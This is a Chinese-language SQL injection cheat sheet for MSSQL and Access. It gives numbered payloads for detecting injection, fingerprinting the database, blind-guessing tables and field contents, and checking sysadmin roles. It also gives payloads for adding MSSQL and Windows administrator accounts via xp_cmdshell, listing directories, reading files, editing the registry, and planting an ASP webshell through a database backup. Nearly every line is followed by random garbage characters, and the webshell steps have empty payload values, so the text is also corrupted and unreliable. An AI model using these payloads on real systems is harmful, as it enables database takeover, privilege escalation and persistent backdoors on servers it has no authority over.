1.判断是否有注入;and 1=1 ;and 1=2 <m") 2d�J
2.初步判断是否是mssql ;and user>0 ��>j&�+mii
����_t��l
3.注入参数是字符'and [查询条件] and ''=' ��6I5�,PB
�H83Gx;��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �*OoM[wEY�
\���U(;%�V
5.判断数据库系统 >%�x N�?%�
f�MGL1V��N
;and (select count(*) from sysobjects)>0 mssql �n�u'r��`
1=R6||�8ws
;and (select count(*) from msysobjects)>0 access e|6�k�gj3/
G6l:��El&�
*<.{sx^Gk
�+`y{�r^xD
6.猜数据库 ;and (select Count(*) from [数据库名])>0 i�hv=y\J�t
`,-w+3?Al�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �BYh����F?
ao+l�LC�r
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 D's Tv}��P
�I-L52%�E]
9.(1)猜字段的ascii值(access) ��y�;'�yob
i��.�O670D
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 A>C&`�A=-�
8X�S_I{}?�
(2)猜字段的ascii值(mssql) >��h!>L��l
nU^�-D1s{
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 J�f#Ika&px
�*y6zwe !M
10.测试权限结构(mssql) �S-^:p�5{r
Bf)}g4nYn�
DQ#rZi3I�
H<Ne\�zAv�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 8�[PD`*��w
3e)�W_P*0?
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- t[dOWg�H�i
;��7�;=)/-
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- +-s�$��Htx
eUY/�H�1��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ]RBT9@-�:U
��-k4w�$0)
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- p�ZVT�:qFF
�][gr(-6�8
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- v��--Q�b�u
WN��O|ziy
;and 1=(select IS_MEMBER('db_owner'));-- 1" k_l.\,0
vS@�;D�7ep
P�G51�+�#
*h <�_g�n�
11.添加mssql和系统的帐户 ��-V�C
k�k
�-l:4I6-hi
;exec master.dbo.sp_addlogin username;-- e1Ne�{zg�~
;exec master.dbo.sp_password null,username,password;-- rA�v)�k&l
/�-{C,+cB�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- FV 0x/)<�z
�B��v=���
;exec master.dbo.xp_cmdshell 'net user username password Qr�u
iQ/�t
-2D��/RE7|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- GBh$nV�n�$
nfj8�z�@�!
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �-za+Wa`vH
<~�d3L4h*<
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ryC7O'j�_P
iJ-z&�=dOe
:�kQ%Mj>��
�b�{~64/YJ
12.(1)遍历目录 uG\ @e'�pr
Ro�2Ab^rQ|
;create table dirs(paths varchar(100), id int) �006�q�j�.
6bE~m<B\�`
;insert dirs exec master.dbo.xp_dirtree 'c:\' E�uJ_�UxkG
O4�+a�[�82
;and (select top 1 paths from dirs)>0 P(��G�v|Q@
uQ(C,f[6p
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �# ���$N)�
E"/r*�C+T�
�dE_d.�[!
t.s;d�lx[@
(2)遍历目录
�*v}3�So�
��8@�)4)+e
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �#�;��+ABV
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 z1AYXW6��F
Q�m(�KvL�5
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��G`��D~OI
9%�^�IMUWA
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 j�i&�%'�h�
?D\6@G:,#@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 q{��c/TRp7
,f[�`C-\Q%
3�*��v&6/K
Gg,&~
jHib
13.mssql中的存储过程 gP�13�n!�7
��'(�6
^O=
xp_regenumvalues 注册表根键, 子键 ;^"#�3_7T]
Sjm�Wl��f,
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ozCH1�V{p�
cns~��)j�~
xp_regread 根键,子键,键值名 ]di^H�>,xU
��4�WAs�_~
;exec xp_regread ^*$�lCUv8p
Fr�|Ts�>Kx
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 [��Y�TO�rN
�<@]��(uWu
xp_regwrite 根键,子键, 值名, 值类型, 值 n>o0PtGxC�
�o4U[;.?c
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �e,X�{.NS
�yu.N>��[=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 O:���J;zv\
�Cq��r��a\
xp_regdeletevalue 根键,子键,值名 @p�\te7(P%
-�#y^�$$i0
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 {L#+v~d^'n
�4i�P�xtVT
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 X }""=
�S<
w��vnuE<o8
CKu�f'h#�
z�0F'zN�3J
14.mssql的backup创建webshell �0]�u=GD%�
U#��mrb�W
use model o_#F,gze)S
+gh�*n,:|�
create table cmd(str image); Ij_h #f� �
V|q`K�OF��
insert into cmd(str) values (''); �0;X0�<IV�
F8*�zG 4/&
backup database model to disk='c:\l.asp'; �x�C5�`|JW
(o�G-h�"^/
�B�e4n\c�.
�p+y2w�{�{
15.mssql内置函数 ixjhZk�i<�
8jd��Ex�&K
;and (select @@version)>0 获得Windows的版本号 +�wpQ��$)\
��m`lx�Qik
;and user_name()='dbo' 判断当前系统的连接用户是不是sa &f"kWOe$X
rP<S�
=eb�
;and (select user_name())>0 爆当前系统的连接用户 Eo��@�b)�h
�CW �.
O"_
;and (select db_name())>0 得到当前连接的数据库 79y'PF�Sms
�0,M1Q~u%.
uupfL��>�h
0�XLoGQ�=
16.简洁的webshell FJ�C}xEMcN
?�,�AWXiif
use model &`�}8Jz�=S
:OC(93d)0�
create table cmd(str image); �2`V�[N�b�
�yu�9��8d1
insert into cmd(str) values (''); 6d#:�v�"^,
[�}�1+=Ub
backup database model to disk='g:\wwwtest\l.asp';
